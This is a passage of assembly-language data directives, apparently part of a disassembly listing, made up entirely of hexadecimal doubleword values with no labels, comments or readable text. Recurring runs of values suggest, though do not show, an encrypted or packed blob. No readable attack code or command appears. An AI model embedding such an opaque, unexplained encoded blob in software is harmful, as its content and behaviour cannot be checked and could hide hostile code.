224A1718h dd 0AB7A95C7h, 70DB206Eh, 80581028h, 0F0286970h, 6727C4B8h dd 5107CCB6h, 0C577C09Ch, 709EDC3Ah, 0A6BCC0BDh, 3561E96Bh dd 0D03E7C34h, 0F22808C9h, 411900B8h, 0A597F08Eh, 50BEFCDEh dd 6B3B7595h, 0A398000Eh, 0E0B97491h, 2F59112Ah, 0C6133A0Dh dd 344C07B8h, 0B463527h, 9370C0CEh, 65C36D98h, 69C9000Eh dd 0DAE94A9Bh, 2F3BBF79h, 0E5D764EBh, 4A3C403Dh, 0E0E37BEBh dd 8BCB4Bh, 0C71D6D24h, 1BC83625h, 0B0E92CE2h, 0D882CB78h dd 0F3286099h, 7083AB40h, 969B6B53h, 178DB499h, 5E4315FAh dd 0C3C7C7BBh, 3BBFECD3h, 0BA5C10ACh, 9A7A31D8h, 0FEDD7F47h dd 0BB6896E3h, 66B3A275h, 7C6C6318h, 794BCF13h, 0DAEFE75Fh dd 5908A878h, 0A3EB63D7h, 471CC6F7h, 6C2DF299h, 22EBA9B5h dd 16C79377h, 0F99F5C4Ch, 0C7874436h, 0A54B1C0Bh, 9E4D12EAh dd 622DD6CCh, 5E07C9ABh, 20F085A4h, 15DA8F74h, 0F19C004Ah dd 0C48D472Ah, 0A47B2F30h, 0F0286298h, 1048FFE8h, 531AC9D9h dd 39F2EE9Ch, 86867Dh, 0D9860054h, 0D7C86B1Bh, 0BA6D251Fh dd 0FA4503FBh, 420DD3EDh, 7F22D5F8h, 76A88EB1h, 4DA896Eh dd 789D0A4Dh, 0B0E82058h, 4AE5C125h, 36285686h, 265DEB3Dh dd 0A597A0D8h, 50BEFB7Eh, 4B708D9h, 1BD66A04h, 86D31EEDh dd 0ECA41978h, 960215B6h, 0DB7BE39h, 8DE583ADh, 50BEFCBAh dd 27AA9693h, 1D6D669Dh, 86DF97DDh, 0D8DCF78h, 0A2856AFh dd 9CB2C631h, 81935E96h, 0BB4722F9h, 8B800848h, 0EC4BFFC7h dd 0C5EC287Ch, 0D000A83Ch, 0B67B6098h, 5C0CAEFBh, 0A597A094h dd 50BEFB6Ah, 7DDC2013h, 0C3CA6AABh, 8BD2B5A7h, 0F7404Eh dd 0EB6880Bh, 1BA07F47h, 6368A0D8h, 1FD783BEh, 3CECCE4Bh dd 5370074h, 0B0DE1BCAh, 2FF6C390h, 6218867h, 9DB77F47h dd 305EB20Ah, 0D50509CBh, 709EDFF4h, 0C1995169h, 0E1B97108h dd 0EB86D587h, 0FBC060AEh, 454880B8h, 33AE58Bh, 1CCCEECAh dd 0E557E054h, 90FE3BAAh, 0B0E82AB0h, 0A07B3778h, 844609EAh dd 4048C1DEh, 0B523527h, 0D501C0CEh, 709EDB5Ah, 1D453137h dd 0B0DE3929h, 0EC40C5F1h, 0F7960AEh, 2673122Dh, 340033D8h dd 0DD88C0F8h, 46B19EADh, 2D455938h, 0B0DE1C76h, 2FFD8990h dd 75EF0667h, 107E9ED9h, 95EBF0D8h, 50BEDE9Bh, 513D6D18h dd 0C0C83626h, 0DAE94A0Ch, 0D2601278h, 0FA86098h, 2674B22Dh dd 6AA825D8h, 0DD05E28Dh, 709EFE4Ch, 1DCE6A6Ah, 86F641EDh dd 805E1478h, 0F7A31C8h, 2674B62Dh, 0A597F8D8h, 50BEFCD6h dd 4EE765DEh, 78C8000Eh, 0B0E82054h, 9347132Fh, 0DE1A53D3h dd 1004CCFCh, 0BFA3527h, 381BC0CEh, 70A8E01Fh, 881DB5B5h dd 3DB1206Eh, 0E633BEC5h, 56C8898h, 1CA07F47h, 6768A0D8h dd 1EC18EB1h, 3486B45Dh, 6FC84C74h, 86D3B2CDh, 0DFC8C578h dd 0F02A551Ch, 152013B8h, 0BD68A0D8h, 6691D34Dh, 0CD25B918h dd 90FE3C22h, 4F1D2DB0h, 0CEB5C387h, 0F02856A4h, 125804B7h dd 0DCE9A0D8h, 5088C168h, 71A9884Ch, 5370038h, 0B0DE1BA6h dd 0D19884F9h, 7B786098h, 4248EA6Ch, 0C763527h, 900DC0CEh dd 18A59541h, 90C813B0h, 8B5AB5A7h, 32E3404Eh, 0EE4BDD1Bh dd 6548808Eh, 57ED2DF1h, 88F6E6h, 4CA275E7h, 504D000Eh dd 0B161A457h, 90834078h, 0F28EB94h, 73CD0F88h, 0F66896C6h dd 66B68F7Dh, 70C2E118h, 92A20152h, 8CFEB5A7h, 288B404Eh dd 90AC6F67h, 834880B9h, 2E373555h, 40E2C0CEh, 0E557B34Ah dd 90FE3C3Eh, 35E7E0DDh, 0D0084138h, 0EE51DD15h, 18F9808Eh dd 0CF92E330h, 501CA807h, 5BF6E018h, 0B4FC89DEh, 3A7DDF0Ch dd 5D087643h, 0C636E725h, 0F84931B8h, 0CF975AFCh, 4EFC5575h dd 70C2E02Eh, 90C81450h, 4FBB7258h, 0E63452EDh, 0D46CED98h dd 0FCDD0DACh, 606896E7h, 0DB8276F7h, 0B1BCC45Ch, 0DACA08D8h dd 0B2A23259h, 0DB0B0A6Ah, 702044DCh, 0F0898F59h, 7463F1D0h dd 6277D0DCh, 20156D48h dd 78C83604h, 0B0E82044h, 0A83E6E5Dh, 0DE084EB8h, 356DBA98h dd 48508EFDh, 75A8B8DDh, 3FE2EA6Bh, 90E84E71h, 0F27DDF0Fh dd 51087643h, 0F028CC5Ch, 4048EAB8h, 0A597F38Fh, 50BEFCEAh dd 652C6D93h, 90A2000Eh, 79833BBBh, 0D5E01175h, 0D6286098h dd 1042E49Dh, 72FD5F8Fh, 0D388F6C3h, 9BF8ECDCh, 90CF6833h dd 0D652058h, 0D03E5EF5h, 65D733CFh, 107EBCAAh, 6416605Dh dd 6CD87575h, 0D52BE02Eh, 90FE15BCh, 0FF65AD58h, 0FB087646h dd 0A1280A56h, 85B7D3EEh, 305E9CD6h, 2E88387Bh, 8E237137h dd 0AC98B5B5h, 0BD58206Eh, 0C07DEE8Ah, 0A1988F8h, 62297F47h dd 0BD6143CFh, 0BA63C18Fh, 0BE832F93h, 0AC98BDB5h, 141B206Eh dd 69E3B7FFh, 0F2BD9FCBh, 9048B684h, 67DCB65h, 7AFCC1F8h dd 70DDD070h, 225DFF38h, 30E81663h, 0E6360FC5h, 0E15C6098h dd 0E2B057Fh, 3068A0EEh, 0D54EC0F8h, 709EDE57h, 6EC0E938h dd 352FDFA7h, 0D03E550Ch, 70286098h, 104C42E5h, 1027AAD5h dd 3EE7AF96h, 50CE8F38h, 0F5AE6954h, 90A70079h, 0B565290Ch dd 0D04714B8h, 7524E5DBh, 4409D2BAh, 5A85E19Dh, 5088C038h dd 0E3E84F18h, 0D5854D2Dh, 0B16F600Ah, 9E4D04EAh, 42428D99h dd 5E0DCCBDh, 23EDAC8Ch, 50D18C6Bh, 0E0B86150h, 0DE890021h dd 0A86D601Ch, 844B05E8h, 3C3CEED9h, 511CD3F8h, 3EE1A496h dd 5D88DA7Fh, 0F19F0A35h, 0D980432Ch, 0B1282716h, 94080CF4h dd 7168F9D9h, 5E48C4B6h, 24E0A791h, 1FCEC034h, 0E2AE204Ah dd 0D4864531h, 0F041600Bh, 844101EFh, 47428D82h, 551AC5B0h dd 35FAA1D8h, 5C79938h, 0E2AE2014h, 0D4864531h, 93287F0Bh dd 0D14D0DF7h, 303CC998h, 4448D3B1h, 71EDAD91h, 57DCA938h dd 0F1A4204Bh, 0B4C9452Ch, 983887FCh, 696857CAh, 39930533h dd 247806CCh, 0B83580F9h, 0A02BB2AAh, 0C7823BC5h, 22D28B01h dd 0E0D12485h, 0D5480E77h, 61E9B5D6h, 30B3C905h, 5088C0F8h dd 70A8E018h, 90C80038h, 0B0E82058h, 0D0084078h, 0F0286098h dd 104880B8h, 3068A0D8h, 5088C0F8h, 70A8E018h, 90C80038h dd 0B0E82058h, 0D0084078h, 0F0286098h, 104880B8h, 3068A0D8h dd 5088C0F8h, 70A8E018h, 90C80038h, 0D0E82058h, 0EFB4E5FBh dd 732860AEh, 2677401Dh, 8767A0D8h, 305D4BBh, 3B1FEF00h dd 1B18033Eh, 9BCC041Ch, 0C97A4C3Ah, 832022A3h, 40A0BACh dd 0B964E2F3h, 66B77C6Dh, 0B02D6918h, 7BC83607h, 982AA35Dh dd 1269999Ah, 75A0609Ch, 107EA4F4h, 3068C430h, 5097A8F8h dd 0F525E018h, 90FE2341h, 0C4F01901h, 0D4C8C374h, 75D7977Ah dd 107EBF24h, 33B1571Bh, 66AC8C75h, 8FB80318h, 9047FC48h dd 52ECC8DBh, 0A995C98Eh, 732856BBh, 153C8082h, 426B92F3h dd 0ACC64DE8h, 0F3F6BB40h, 94BC0002h, 0B30312A7h, 38183287h dd 0FD79FCFh, 9D634E93h, 305E9F18h, 64C3C3A0h, 0D02D6FDBh dd 57C83607h, 86D7BCDDh, 0D0084078h, 0F0148898h, 95C380B8h dd 305E9F44h, 0AF7E7010h, 70B008E7h, 2D4B0038h, 0B0DE1FC4h dd 59003578h, 0C60B9505h, 0EFD46BB8h, 6573C55h, 0D50703F8h dd 709EDFB8h, 0AF5495B1h, 0B300206Eh, 0E3084078h, 63A3A351h dd 10488038h, 0CE85488Ah, 0C58B3F07h, 709EDFD8h, 0EA4BD63Bh dd 34E72054h, 0D008417Fh, 0F0381A1Bh, 10B504B7h, 72E3A0D8h dd 986090F4h, 73571FE6h, 0A6F7C0BDh, 0E02E2358h, 298848F2h dd 70311498h, 133CAE41h, 0BB994B98h, 0B109C1B0h, 0AF773FC7h dd 0DC8CF9B9h, 5C9D2014h, 53C06B21h, 7F279A61h, 1048800Fh dd 0CE1021BEh, 0D587F2CBh, 70A8E0B3h, 90F2836Eh, 0FA63252Dh dd 5B0AAB68h, 0A1D96392h, 0EFB6F250h, 0F0DDA327h, 0FD88F6C7h dd 8BD0209Dh, 904C8437h, 5172058h, 0D03E7FB8h, 0E7D88C8h dd 954B7F47h, 305E9F18h, 6F484577h, 74ABE02Eh, 504B531Ch dd 0BF33135Ah, 0C2EB48CEh, 0A308A918h, 146CA479h, 194CBCF1h dd 10D3E4F4h, 8B2909F3h, 4D73D737h, 4B691E2Ch, 0B6605D0h dd 0BA956ECh, 0EFE9BBE1h, 0CBE98EACh, 0FC3DE22Eh, 8B29C66Ch dd 6390E9ABh, 4B693E2Ch, 2350A905h, 0BA976ECh, 0F16DBFFEh dd 0CBE9AEACh, 0B1ADFFC8h, 0E557E66Ch, 90FE3F98h, 4F99C903h dd 5356BF87h, 1FC1745Ah, 0D3B77F46h, 686CCAD9h, 0AF7D9010h dd 563D68E7h, 0F6C8361Eh, 0B2F011E0h, 0D3EC809Ah, 5B4E829Ah dd 0F81086D2h, 0CF9755EDh, 0D780027Bh, 28AD8AC9h, 6F3D28D0h dd 0B312A0A7h, 80B84B0Bh, 0D60EE59Ah, 0FBE2808Eh, 6800CAFFh dd 53724052h, 6118F86Dh, 6F3D08D0h, 0B0E998A7h, 28C4078h dd 10F96DECh, 0E6A34A46h, 30D0A533h, 0FB08C0F8h, 0FD6B5FFAh dd 0A6F098ADh, 473F0B58h, 55FF83A2h, 0F01E5813h, 184880B8h dd 0F1A835D7h, 0D57ECB18h, 709ED891h, 0F6CE7539h, 5BCDA955h dd 598DB66Bh, 0F22856A0h, 1D2E86CDh, 348385E9h, 7589CD9Eh dd 0CC404B7Eh, 1B37FFC7h, 2561141Bh, 0D03E7FCCh, 75DFA333h dd 107EB833h, 3868A0D8h, 544855F7h, 0EC404AA4h, 1937FFC7h dd 86D798CDh, 598DB678h, 0F12856A0h, 214784CDh, 0F043A233h dd 0D57F0353h, 709ED893h, 98C80038h, 3562072Ch, 0D03E78FDh dd 96238059h, 760D0BB5h, 9A901073h, 680D4572h, 9069E02Eh dd 0F4AF0523h, 834326D1h, 3BA326B8h, 7F4CD88Ah, 9AE380BDh dd 650255Dh, 91D0C4F8h, 0B303F8F8h, 0B023FC88h, 0B003983Eh dd 0C9E3EB1Eh, 187064F2h, 0EFB774A1h, 0F1BAA455h, 55EEC818h dd 0DBCE2091h, 7803D3h, 0E8EA4AF2h, 2FFC4090h, 84FAE467h dd 4840EA8Ah, 0CF9B5430h, 22423E07h, 8E6D94DBh, 6E0174F2h dd 4E335492h, 2E0434B2h, 0E241452h, 0A044F472h, 80A54B21h dd 0E0412B05h, 0C06D0BEDh, 5309EBC0h, 88709DD5h, 55FF404Eh dd 0F01E5813h, 904880B8h, 50D8A3ACh, 0DB0D3752h, 70A8D620h dd 0E4C00038h, 3BBD985Fh, 9FA34094h, 0C8A3E56Fh, 104B808Eh dd 0B467A1D8h, 5088C02Fh, 0DB0208A8h, 0AF6CBDB1h, 5858206Eh dd 6D81EBD2h, 0F01E5F30h, 28C3054Fh, 306BA0EEh, 45FCC0F8h dd 482365EFh, 90C8000Eh, 0B59C2158h, 2FF68190h, 5AC1D067h dd 0B4CD0B13h, 0BB6896E7h, 0D940EB37h, 46974CA5h, 6C808938h dd 4F8C47E0h, 103BEB4Eh, 75DFCBFEh, 107EB833h, 3068A0DBh dd 0D57ECE8Ch, 709ED891h, 78CD74B8h, 4F17DE1Ah, 596C27C0h dd 301BCBBEh, 95BF2BDEh, 305E9853h, 5088C0FBh, 0F55EB56Ch dd 90FE38B1h, 58ED55D8h, 2FF7BE66h, 0FD5C470h, 0F8683047h dd 0CF975B6Eh, 0E8EEF91Bh, 0DBCEF5E7h, 543ABA9h, 0B0DE18D3h dd 12FF928Fh, 0F028609Bh, 6EA094CDh, 80975F25h, 0AB1828E7h dd 0C8CE1FE7h, 3BAE15C7h, 7F638BC9h, 0EFA4C5F3h, 380360AEh dd 0E7B4C831h, 6502B5Dh, 5088C3F8h, 87869418h, 0A6F08BBDh dd 0B0E82058h, 272A347Eh, 0C610EB1Dh, 104880B8h, 0D86DD5D9h dd 0AF773D0Ah, 482365EFh, 90C8000Eh, 0B59C2458h, 2FF64D90h dd 7BAD9767h, 1448B680h, 4468A0D8h, 0AEEF28EFh, 59101FE7h dd 3B00FEF8h, 0C42828E0h, 0A5B0EB7Ch, 5B4F8B60h, 28C3054Fh dd 3060A0EEh, 1FFDC0F8h, 48215D98h, 0E4C8000Eh, 4ED3C81Eh dd 0F9B0BF87h, 0FAE14980h, 2670051Dh, 338C60D8h, 680D65F2h dd 0C003E02Eh, 1542AA89h, 0B0DE18D1h, 0DA48F0D2h, 0C610E51Dh dd 0A82E2AB8h, 0B59F5D3Ah, 50BEF873h, 70A8E008h, 0D978074Ch dd 0C55046F2h, 60A32684h, 301BCA70h, 80F50913h, 0C76896E7h dd 66B04B7Dh, 70A8C018h dd 20C17538h, 336D2A00h, 7A087640h, 30A9D8FEh, 28C3054Fh dd 3028A0EEh, 53FCC0F8h, 7A802498h, 0A6F0839Dh, 39434658h dd 0E637D4C5h, 75DFCB98h, 107EB833h, 7068A0D8h, 38C98Dh dd 482B651Ah, 6762000Eh, 86D0ABDDh, 0D008C078h, 40231598h dd 94CD8A00h, 9A6896E0h, 0E8EEFD13h, 0F55FF829h, 90FE38B3h dd 0B0E82158h, 0F9B8420Ch, 0C8ACC592h, 0F488808Eh, 0B4CDAADBh dd 3688F6C0h, 0F11086B3h, 1B4DF7C8h, 0B0E81660h, 0A508407Ah dd 0FAE0D49Ah, 2670041Dh, 0B9C3C6D8h, 66B77045h, 58305818h dd 67630038h, 86D0ABDDh, 0D0084878h, 18591498h, 0EFB77D89h dd 8E3252Fh, 5488C0CEh, 7BDDE018h, 15C2B888h, 0B0DE18DDh dd 2745ABD2h, 0C610EB1Dh, 104080B8h, 5679D5D8h, 5A684340h dd 469065BDh, 0A3636638h, 0A5038A98h, 0C821F81Eh, 0C8ADC592h dd 0F488808Eh, 0B5CDAADBh, 3688F6C0h, 0FB2D17B3h, 90C83600h dd 0D6E82048h, 0A4C8C1C0h, 0F8ECE09Bh, 28CD25B2h, 9B0EA0EEh dd 0D90D76F7h, 0DBA8D620h, 6F34C0D0h, 3B6DD7A7h, 0D0087640h dd 84686098h, 121830B1h, 650235Dh, 0D57F6AF8h, 709ED893h dd 90C82038h, 0B29DA6E8h, 9F85447Ch, 738DEA66h, 9948B680h dd 6573855h, 0D023A6F8h, 77DDE5E4h, 0DF480088h, 584260A7h dd 2FF7BC01h, 0C8A3E56Fh, 5048808Eh, 880EA0D8h, 52FDF19Eh dd 0DBCEC9ACh, 15C21888h, 0B0DE18DDh, 7A0BA0B8h, 0FD43470h dd 0E7C03047h, 6502B5Dh, 5008C0F8h, 0C0AA9518h, 136D8ABEh dd 0D6E81660h, 0D5F4C0D3h, 0F09867EDh, 50B7CF38h, 0CC434872h dd 0D57F3F07h, 709ED893h, 90C90038h, 0F0582B2Dh, 0E88BC572h dd 1B8260AEh, 93F0E6B7h, 0B3CDAA18h, 3688F6C0h, 0DAA950B3h dd 0A84385CFh, 0B0E8206Eh, 0FF7D407Ah, 0C8A3E56Fh, 1048808Eh dd 2A1DA0DCh, 0D5820048h, 709ED89Dh, 0A842A5B2h, 5029206Eh dd 0B6B02668h, 0F098CB19h, 50F88853h, 8ED25D2h, 0A722C0CEh dd 46906B9Dh, 98C80038h, 0D6F85558h, 0DAE0C3C0h, 0C610E43Dh dd 0A0E3E6B8h, 80604BD9h, 0D40DCAB0h, 0DAA8D620h, 0A84385CFh dd 0B0E8206Eh, 0A5B94068h, 484E45EDh, 0B542783Bh, 305E985Ch dd 90BB6B9Eh, 0E815C9B2h, 67C83607h, 86D0ABDDh, 0F0084078h dd 41371598h, 76536BCFh, 3A70A960h, 66B0445Dh, 734C2018h dd 0A84CA532h, 1B8E206Eh, 0EF90FD51h, 31A260AEh, 2FD02532h dd 9B0EA0EEh, 0D58A9848h, 709ED89Bh, 1B4DF792h, 0B3E81660h dd 0A4094078h, 7BAD97BAh, 1048B680h, 456CA0D8h, 0DB0D37EEh dd 70A8D620h, 0E5CB0038h, 4A6CC85Dh, 7BE0BF87h, 7D79F62h dd 26700B3Dh, 3068A0D8h, 0E08BB4F0h, 0F55F4AD1h, 90FE38B3h dd 30E82058h, 0D7B8600Ch, 0C8ABE5B2h, 0F089808Eh, 38E1ADC2h dd 0F58AC0DCh, 709ED89Bh, 10CBE4F8h, 43249Ch, 686EEA19h dd 55228067h, 107EB83Bh, 0B59F0BBEh, 50BEF873h, 70A8E038h dd 153F534Ch, 0B0DE18D3h, 0F0084078h, 37DF6DECh, 104880BBh dd 0A0D8A5ACh, 0DB7B2B52h, 0E0256BDFh, 0BBC83607h, 4CA9A999h dd 550218C8h, 0F01E581Bh, 9BCD7712h, 306896E0h, 248880F8h dd 20108614h, 134D0AFBh, 5BE81660h, 2FB02672h, 738D6A78h dd 7648B680h, 0BBED5773h, 5388F6C0h, 4A9E018h, 1B4DF74Bh dd 0B0E81660h, 0A4284078h, 0F3EF9795h, 644880B8h, 9AF810DDh dd 9F033313h, 4F006593h, 58E3000Eh, 831468D1h, 5B8DB7B1h dd 0F02856A0h, 654800B8h, 0B3ED2DD6h, 0DA88F6C0h, 8928A010h dd 1D30733Bh, 94ACED5Ch, 30C94068h, 5BA3D090h, 0A82E865Bh dd 9B0E60E9h, 0D007789Eh, 70A85870h, 0F6290238h, 354378F3h dd 0B60E35B1h, 96E85120h, 0BA8B3013h, 8F02555h, 0D57FC0CEh dd 709ED893h, 80C80038h, 9BBF262Dh, 0C9E31880h, 0DB003313h dd 9B98AB40h, 6571055h, 0C01DC1F8h, 71A8D627h, 0B48C8B01h dd 0D855A95Ch, 5B087668h, 0C617F425h, 80CDABB8h, 0C76896E7h dd 66B04B7Dh, 70A8A018h, 67CA7438h, 0B42A8B80h, 535F1678h dd 0C617A825h, 944780B8h, 3068A101h, 5088CD10h, 22EDAB18h dd 0A3844576h, 0FCAC0E6Ah, 45F74034h, 0F01E5BE2h, 2F940531h dd 0BB3BA0EEh, 888BFCA0h, 0FB8093E7h, 7020347Bh, 3B17DFADh dd 0E637FCEDh, 0B22B3B98h, 0F0CD09B4h, 336896E7h, 0D501C8BAh dd 709EDFFCh, 6FE073B3h, 0B0E8A0EBh, 25B1A878h, 4DA39F67h dd 107EBF04h, 0C5C5488Eh, 0C5033F07h, 709EDFA4h, 93C04AB3h dd 7EC32C12h, 0DF0DA9FBh, 0F0290010h, 4ACC8FB8h, 3368A0D9h dd 66B7004Dh, 0F01DE318h, 3CC83607h, 35E7C864h, 0D00840DAh dd 0DB2C2615h, 2677003Dh, 606EA3D8h, 0AF7DAA10h, 0CC1563E7h dd 90C83607h, 0F7D32B2Dh, 0CB8B4F74h, 1B286099h, 0ACDDB9B4h dd 3F6896E7h, 5089CD7Dh, 0F02DE318h, 0F6C83607h, 951718D9h dd 0D0F4C577h, 0B0A36098h, 240BABBAh, 0C5454888h, 0EDB13F07h dd 709EDFA4h, 902C8537h, 35EB2058h, 0D03E7FB8h, 0CFA8E59Bh dd 10C3808Eh, 3F64E7F3h, 50880D7Ah, 78EFDB18h, 900C8337h dd 706B2058h, 0C44F437Ah, 0CFA8E59Bh, 401A808Eh, 0FB41527h dd 0C577C0CEh, 709EDB22h, 9F088562h, 0B0E897DDh, 0D094A978h dd 0F146098h, 10DC05B7h, 0EE8A0D8h, 0DB0DCFEDh, 0FBA8E018h dd 0D3E3017Eh, 0C00706Ch, 0E9F7BF8Ch, 0C617DC25h, 133FF5B8h dd 657605Dh, 0D00DC3F8h, 0F9A8D627h, 0A6F7E8BDh, 8BE8AB58h dd 0E637A0FDh, 0CB201298h, 2677643Dh, 0D01D2D8h, 2088C0F8h dd 6F40D76Ah, 1DC80038h, 7163DC16h, 920B4253h, 18AD5B88h dd 6548B687h, 20AC23D4h, 1407F107h, 9BC9FC3Ch, 1547C323h dd 0B0DE1FF8h, 50BDCB18h, 182856A7h, 0EFB775E2h, 306809B9h dd 5EFD40F8h, 2A4A733h, 988F3B31h, 4FD4A257h, 0DF41BF87h dd 0FD6D21Dh, 34740B47h, 18E30759h, 0AF77C0F8h, 32439FE7h dd 0F0EC4AB9h, 0FE082058h, 0DC83804Bh, 38ADE7BCh, 9948B687h dd 657645Dh, 0DF314DF8h, 73A8E030h, 0A6F780BDh, 154D4658h dd 0D3CE6B36h, 0B20374DAh, 0EB0E46B4h, 63E96730h, 5588C0F8h dd 0F9A8E018h, 0CE97FC7Eh, 2517779Bh, 0D03E7BFEh, 0FF378859h dd 10499A3Dh, 5A3CF0D8h, 0AF77AAD0h, 4693068Dh, 0CF088538h dd 0B1EDA857h, 8AE04078h, 18D79F7Dh, 104880A9h, 761CC58Bh dd 3EDAC91h, 2DD837Dh, 0D1B17451h, 0E45DDF58h, 2F087647h dd 0C6135A0Dh, 4CCD09B8h, 0D86896E7h, 5088C0E1h, 11FC854Bh dd 0E7876553h, 0C39A4536h, 80782910h, 995E09EAh, 752FE5D4h dd 1B80F7D8h, 0B8773F11h, 70A8E00Bh, 0F59A656Bh, 0C287542Bh dd 0B97A101Dh, 954409EEh, 4748E5DFh, 0CF81AD30h, 509A2807h dd 15FBE018h, 0FBAB617Ah, 0C2B8502Dh, 0BC613611h, 0F04D07FDh dd 0F8B868EFh, 28805F27h, 388C0F8h, 11C0A37Dh, 0DEAD6756h dd 0D6815437h, 0B97A1001h, 954409EEh, 4748E5DFh, 0CF806D30h dd 0DDDC9007h, 4692789Dh, 0C0AC6A38h, 4FBF2132h, 0E633B2EDh dd 0D414E998h, 2B661547h, 0F042A0EEh, 6ED87D75h, 20F8E02Eh dd 87DFF68h, 0D8E81662h, 0D00C4079h, 0A7290ACCh, 2F141547h dd 5A3CA0EEh, 0C57797FCh, 709EDF44h, 6FDCC4BBh, 86D774EDh dd 0BA9DBF78h, 0AF2856A3h, 40FD0D7Bh, 666896E6h, 6BE65507h dd 882BE02Eh, 2B4C0FC7h, 39E82058h, 0E63720FDh, 0A6280A98h dd 2BE21547h, 0F0EDA0EEh, 502C44F7h, 0B083E018h, 93A25068h dd 0D8E94A08h, 10084078h, 0BABD9FCEh, 9348B683h, 0B4675F20h dd 5088C510h, 4FCC6591h dd 1D45000Eh, 0B0DE1F30h, 0EF78D5F5h, 0A27960AEh, 0EF1880D2h dd 653D64Dh, 0AF7043F8h, 751E6417h, 90A20038h, 8F8C95A7h dd 45F7404Eh, 0F01E5BEAh, 1FB7783Bh, 306D3F5Ch, 280D49F8h dd 43A8D627h, 0C10B03F1h, 0B4827108h, 0B4BDBF29h, 0F2856A7h dd 2673CE2Dh, 3FA825D8h, 508DBB7Ch, 0F961D318h, 0A6F77CBDh dd 0E1B97158h, 0DF085F10h, 65D73098h, 107EBB2Eh, 0B467605Dh dd 5088C5CCh, 4F286591h, 280B000Eh, 0B0E84FB7h, 27300BF3h dd 0C610EB1Dh, 104880B8h, 336ED5C8h, 6698A87Dh, 737AD318h dd 6739F7F9h, 3C6DA9B9h, 68087647h, 0F028480Fh, 1374CB33h dd 678C85Dh, 535AF3F8h, 875917D9h, 144D89D9h, 73E81667h dd 0D643F777h, 7D1D8361h, 0A74798EBh, 0E06BB49Bh, 7849ABB1h dd 4A29301Bh, 0FEA17767h, 33F554A1h, 0A2094C02h, 0CC63EB78h dd 135CC233h, 74E5B09Ah, 897F3FB0h, 0F593213Bh, 90FE3F40h dd 94BCAB9Bh, 5FC87368h, 0F028D81Ah, 0DFC343B8h, 8DE5AB33h dd 50BEFEA8h, 43776BE4h, 0F1F4ACF1h, 0CAD4262Ah, 0F024420Fh dd 84745C32h, 6466BC54h, 45689C05h, 0DB412310h, 28EDDD19h dd 9BBC007Dh, 0E2AB7365h, 0E38D4F78h, 7BD79F67h, 591FBDBBh dd 0B467E396h, 0AF773FDEh, 25EBB725h, 8B4C0F76h, 8D17DFA7h dd 0E23B032Fh, 0F38E497h, 40757F47h, 3F27F48Bh, 0AF77C57Ch dd 9873D3E7h, 6F37FE15h, 4A00302Dh, 38F7BF84h, 0FD79EB9h dd 0EEA404B7h, 0E25B5F27h, 5088D610h, 8FCB0818h, 9020FFC7h dd 0EDE82058h, 0E331ADF9h, 2BC160AEh, 744880BBh, 85E39227h dd 50BEFF78h, 168A697Ch, 0CA853EB9h, 0B32CA557h, 8E834078h dd 96F663A4h, 5518BB39h, 33DC25D7h, 137FC0F8h, 7088E00Eh dd 374D0F38h, 46E8205Bh, 0DF0A1C3Bh, 0F02BFD1Ch, 180B0BB8h dd 90C800E5h, 0DF0CCF58h, 4DA8E01Bh, 0B0E82018h, 0B36CA457h dd 69E04078h, 0FFD79F66h, 104BF93Ah, 0F4CD23D8h, 5088F6C7h dd 0FBA0A293h, 51E31072h, 70DB242Bh, 180B4593h, 79382A11h dd 2677083Dh, 3C22A3D8h, 5188C040h, 0DA40B118h, 0A037FFDFh dd 86D0A9CDh, 0E028F178h, 0C610EA2Dh, 0EE68EAB8h, 2410F811h dd 0AF6F5010h, 7F7A65E7h, 721BC2ACh, 8863B569h, 35E3404Eh dd 0C8A3E56Fh, 1048808Eh, 121CA1D8h, 6803450Fh, 70ABE02Eh dd 9CBD0038h, 886385D9h, 2FF7404Eh, 0FAC39B67h, 28C30D39h dd 3068A0EEh, 56E0C8F8h, 29A8E018h, 90C80650h, 0F2007858h dd 5AF7BF9Fh, 0C610E31Dh, 3ACC06B8h, 305E985Bh, 680B4570h dd 904AE02Eh, 0A84385CFh, 0B0E0206Eh, 0D97D4078h, 0C8ADDD18h dd 6449808Eh, 0BBED571Dh, 5088F6C0h, 4A0E018h, 13758023h dd 0B5E81660h, 6D88F00Ch, 0F01E581Ch, 90EFF4BDh, 6502565h dd 0CEFCC5F8h, 482365EFh, 90C8000Eh, 0B99CA058h, 0E88BFDF8h dd 872A60AEh, 0D8ED0331h, 306896E7h, 0AF7BC710h, 8DC908E7h dd 0E020FFC7h, 3BE8205Ah, 0E637C4E5h, 78B56398h, 0F848B687h dd 0CF975CA1h, 52D844F7h, 0C523E018h, 90FE3FB8h, 0B3D47ED3h dd 2D72A8A6h, 72279F67h, 10488282h, 504CEA59h, 0DB68C0F8h dd 73FEB2E6h, 0EACB1442h, 3B6DD748h, 0D0087640h, 85386098h dd 0DCF509ACh, 0BD6896E7h, 66B0584Dh, 18256B18h, 63C83628h dd 965177FCh, 5D084072h, 0C638602Dh, 0A1ED73B8h, 0C36A43D8h dd 0DB0D375Ch, 70A8D620h, 9FD80038h, 0B0E88EDCh, 0F87BBF78h dd 0FC6D670h, 0ACDD0B47h, 0B56896E7h, 0C80CCF2Ah, 0FBA8E018h dd 0A6F7808Dh, 0A0A2AB58h, 0B02C0AF9h, 0DBC86098h, 123B88F2h dd 426B69EBh, 3805FBECh, 0FBA8D608h, 0A6D868B5h, 3BBE5258h dd 758B6444h, 0F01E70F0h, 78EF03B8h, 3068A0D8h, 5180BA73h dd 87ABE852h, 1543F7BFh, 0B0DE1FCCh, 0E883C58Fh, 0F06860AEh dd 123C80B8h, 426BB82Fh, 0D9B8E9F4h, 469728ADh, 0B8BB8B38h dd 351F1059h, 0D03E78F3h, 0F02860D8h, 8BF82CCh, 0CC214889h dd 0BBD13F07h, 58DBE314h, 0C1C47213h, 0EF4CD30Eh, 48BDCD21h dd 792856A0h, 26774C05h, 6FCC53D8h, 0C2B9CFA6h, 707C6795h dd 5F20038h, 0B0DE18D1h, 261460Dh, 0E21C36E0h, 0F8B8D030h dd 0CF977A63h, 5CC24BA2h, 87B8AA1Bh, 0A6F08BBDh, 0B0E82058h dd 0D549CD68h, 7DA173EDh, 107EBF70h, 200025DBh, 0F70BC0CEh dd 70A8E070h, 0B88B2B38h, 0B0BBA7D1h, 55FF4078h, 0F01E5CD0h dd 104880B9h, 73AFA7ACh, 0F02860F0h, 0FB2D17B8h, 90C83600h dd 0C4682058h, 0AAE0127Fh, 0AAD79F6Fh, 2F800D33h, 358BA0EEh dd 0BBA08B71h, 0B4256B15h, 73C83607h, 3BEBCB5Ah, 55FF6833h dd 0F01E5813h, 104880BBh, 0B5E3B4ACh, 50BEFF34h, 